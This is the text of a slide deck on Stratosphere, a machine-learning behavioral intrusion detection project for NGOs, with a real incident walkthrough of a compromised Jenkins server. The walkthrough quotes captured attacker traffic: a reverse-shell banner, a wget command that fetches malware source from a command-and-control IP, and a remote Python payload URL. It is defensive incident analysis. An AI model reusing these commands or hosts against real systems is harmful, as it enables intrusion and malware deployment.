Machine Learning, Security and the Stratosphere Project
Sebastian Garcia - CTU University, Prague
@eldracote
sebastian.garcia@agents.fel.cvut.cz
https://stratosphereips.org
Stratosphere IPS
https://stratosphereips.org/
Free
Software
Machine
Learning
Behavioral
IPS
Protecting
NGOs
Stratosphere Goals
To
put
machine learning
techniques in the hands of the civil society.
To offer this detection service to NGOs
for free
.
To focus on what computers
are doing
, not the attacks they receive.
Stratosphere Tech Principles
Less is More
Analyze the behavior of
groups of flows
.
Disassociate
Representation of
behavior
from
detection
.
Verify
With
real
and
labeled
datasets.
About Behaviors
Your behavior is usually the
same
when connecting with the same service.
Group flows going to a
specific service
by ignoring the source port. We call it a
connection
.
The connection, composed of several flows, now shows a
behavior in time
.
Network Behaviors
Model network behaviors as a string of
letters
.
1
flow
3
features
1
letter
Malware Behaviors
Malware mostly generate the
same
behaviors.
Changing the behavior is
costly
for the attacker.
These behaviors do
not expire
quickly.
Malware Open Data
https://stratosphereips.org/category/dataset.html
Behavior of Connections
Markov Chains Models
Create, train and store a Markov Chain models
Behavioral Detection
Trained
Markov Models
Similarity to Unknown Traffic
Real Detection Example
Example Detection
January 18th, 2016.
Got an alert from a malicious behavior.
147.32.xx.xx-23.247.5.27-25000-tcp [Global Frag Networks,US]: 88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H,
"For a long time there was a periodic connection (freq 5s-60s), to an uncommon port, with large flows of medium duration."
The Detected Connection
Sent: "+.............P.43.249.81.135.......?."
Recv once: "import time as O000OO0O0O00OO00O"
43.249.81.135
No VirusTotal detection.
AS58879 Shanghai Anchang Network Security Technology Co.,L. China.
Last known domain: lyzqmir2.com. Minecraft server.
The Beginning
103.242.134.118
port
33333
/TCP
[VT:7]
S:"/bin/sh: 0: can't access tty; job control turned off.$,"
S:"
tomcat6
17547 0.0 0.0 7944 868 ? S 13:36 0:00 grep abcc.$
S:"wget 23.247.5.27:435/abcc.c"
23.247.5.27
port
25000
/TCP (main CC)
"=...-== Love AV ==-:..Linux 3.2.0-4-amd64"
Python Script (Deobfuscated by Veronica Valeros Thx!)
"http://222.179.116.23:8080/theme/1/pys.py"
Is it Attacking?
Hundreds of connections to IPs in China, port 80/UDP.
115.239.248.88
port
80
/
UDP
[MoveInternet Network Technology Co.,Ltd.,CN]
Few Kb of binary data sent.
No apparent explanation.
The Attack Conclusion
Strange POSTs to Jenkins minutes before
POST /jenkins/descriptor/hudson.model.DownloadService/...
Remote Jenkins code execution vulnerability
CVE-2015-8103
. Metasploit module.
C&C channel with
10s timeouts.
Receives orders and executes OS commands
Function to send random UDP data to IPs.
Similar to BillGates botnet, not quite.
Stratosphere Data Analysis
Cloud-based
detection service for NGOs.
Add
new
algorithms continually.
Update
the models.
Verify
the detections if necessary.
We sign NDAs, NGOs can send the Flows or
only the letters! Privacy
matters.
New Algorithms
Anomaly Detection
New feature in behavioral letters.
Malicious HTTPs detection.
Graph Analysis of sequential connections.
WHOIS similarity grouping.
P2P behavior
Behavioral Patterns of the
Host
.
Example of Graph Analysis
Organizations working with us
People In Need. CZ. Helping 22 countries. Human-rights, war, etc.
CZ.NIC. Manager of
.cz
and
Turris
Project. 2,000 Internet Networks.
ICT help for policy makers in 20 African Countries
CTU University. With more than 7,000 hosts.
Questions? And Thanks!
Sebastian Garcia
eldraco@gmail.com
sebastian.garcia@agents.fel.cvut.cz
@eldracote